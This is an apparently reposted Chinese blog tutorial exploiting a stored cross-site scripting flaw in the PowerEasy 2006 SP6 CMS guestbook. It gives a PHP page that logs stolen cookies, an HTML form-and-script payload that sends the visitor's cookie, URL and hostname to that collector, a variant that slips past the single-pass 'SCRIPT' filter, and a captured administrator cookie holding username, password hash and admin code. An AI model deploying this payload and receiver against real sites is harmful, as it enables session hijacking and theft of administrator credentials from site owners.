动易2006_SP6最新漏洞得到管理员密码 's

2017年4月10日09:42:31评论316 views字数 2029阅读6分45秒阅读模式

摘要

鬼仔注：从7j那里看到的，并且有7j写的接收页面。7j:没有找到他说的接收页面,只有自已用PHP写个了

<?
$filename = date("Ymd").".txt";
$time = @date("Y年m月d号H点i分s秒",time());
$cookie = $_POST['cookie'];
$url = $_POST['url'];
$hostname = $_POST['hostname'];
if ($cookie <> ""){
$tmp = fopen($filename,"a+");
fwrite($tmp,"地址:".$url."/n主机:".$hostname."/nCookie:".$cookie."/nIP:".$_SERVER['REMOTE_ADDR']."/n".$time."/n");
fclose($tmp);
}
?>

鬼仔注：从7j那里看到的，并且有7j写的接收页面。

7j:没有找到他说的接收页面,只有自已用PHP写个了
<? $filename = date("Ymd").".txt"; $time = @date("Y年m月d号H点i分s秒",time()); $cookie = $_POST['cookie']; $url = $_POST['url']; $hostname = $_POST['hostname']; if ($cookie <> ""){ $tmp = fopen($filename,"a+"); fwrite($tmp,"地址:".$url."/n主机:".$hostname."/nCookie:".$cookie."/nIP:".$_SERVER['REMOTE_ADDR']."/n".$time."/n"); fclose($tmp); } ?>

来源:′失眠ヤ夜 's blog

漏洞主要出现在“雁过留声（留言板）”、“信息管理”和“短消息”里，这里以留言板为例
下面我们来测试一下漏洞
打开留言板，选择源代码模式签写留言
审核发表状态下钓到管理员Cookies的几率比较到
我们先来试试一些文字
输入<>未被过滤
输入<script>过滤成<>，不好意思刚才弄错了
输入scrSCRIPTipt会过滤成script（去掉了中间的大写SCRIPT）
看漏洞出来了
也就是说它会把"Script"字符过滤掉，但是只过滤一次，给了我们可乘之机
（iframe标签你可以自己测试）
下面是一个获得Cookies的代码，会把Cookies提交到http://localhost/cookies/cookies.asp，相关的代码我会打包到教程里
<form name=redir action=http://localhost/cookies/cookie.asp method=post> <input type=hidden name=cookie> <input type=hidden name=url> <input type=hidden name=hostname> </form> <script>redir.cookie.value=document.cookie;redir.url.value=location.href;redir.hostname.value=location.hostname;redir.submit();</script>
现在我们在一些可能的敏感字符中插入SCRIPT字符，以防我们的代码被过滤
更改后的代码如下：
<FOSCRIPTRM naSCRIPTme=redSCRIPTir actSCRIPTion=http://locaSCRIPTlhost/cooSCRIPTkies/cooSCRIPTkie.asp> <input type=hidSCRIPTden name=coSCRIPTokie> <input type=hidSCRIPTden name=uSCRIPTrl> <input type=hidSCRIPTden name=hoSCRIPTstname> </forSCRIPTm> <scrSCRIPTipt>rSCRIPTedir.cooSCRIPTkie.valSCRIPTue=docSCRIPTument.coSCRIPTokie;redSCRIPTir.urSCRIPTl.vaSCRIPTlue=locSCRIPTation.hrSCRIPTef;redSCRIPTir.hostnamSCRIPTe.vaSCRIPTlue=locatiSCRIPTon.hostnSCRIPTame;redSCRIPTir.subSCRIPTmit();</scrSCRIPTipt>
现在我们发表留言

看数据库里的代码是我们修改前的代码
现在以管理员身份登录
现在我们保存cookies的数据库是空的
这是我发送的钓Cookies的网页

好的，现在代码已经执行，管理员的Cookies已经被我们钓到了
我们来看一下
ASPSESSIONIDQCRQQSAT=LCNFLHOBLBPHEJJMHJDPDMGF; localhostpowereasy=LastPassword=4P263W7JiD425kyd&UserName=admin&AdminLoginCode=PowerEasy2006&AdminName=admin&UserPassword=469e80d32c0559f8&RndPassword=4P263W7JiD425kyd&AdminPassword=469e80d32c0559f8
怎么样？得到了吧？
里面有管理员的用户名、密码，和管理认证码

信息管理和短消息也可以如法炮制，具体方法我就不多说了
在这里说一下拿到源码后先要修改一下设置，conn.asp里的数据库路径要改一下
还有test.htm里的URL也要改一下，可以用它做测试

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

动易2006_SP6最新漏洞得到管理员密码 's

Discuz! 5.0.0 GBK SQL injection / admin credentials disclosure exploit

LBS 2.0.313 重要安全更新 [2007-07-03] 's

LBS blog又一注射漏洞含漏洞解析和exp 's

Penetration Testing 渗透测试 (11%) 's

bbsxp 2007[以前版本不知道]一个有意思的漏洞 's

bbsxp 2007斑竹权限注射 's

bbsxp 2007 注射漏洞 's

BBSXP7 mssql版，从注入到拿WEBSHELL 's

LBS 2.0.312 重要安全更新 [2007-06-29] 's

LBS blog sql注射漏洞[All version] 's

发表评论

在线咨询

微信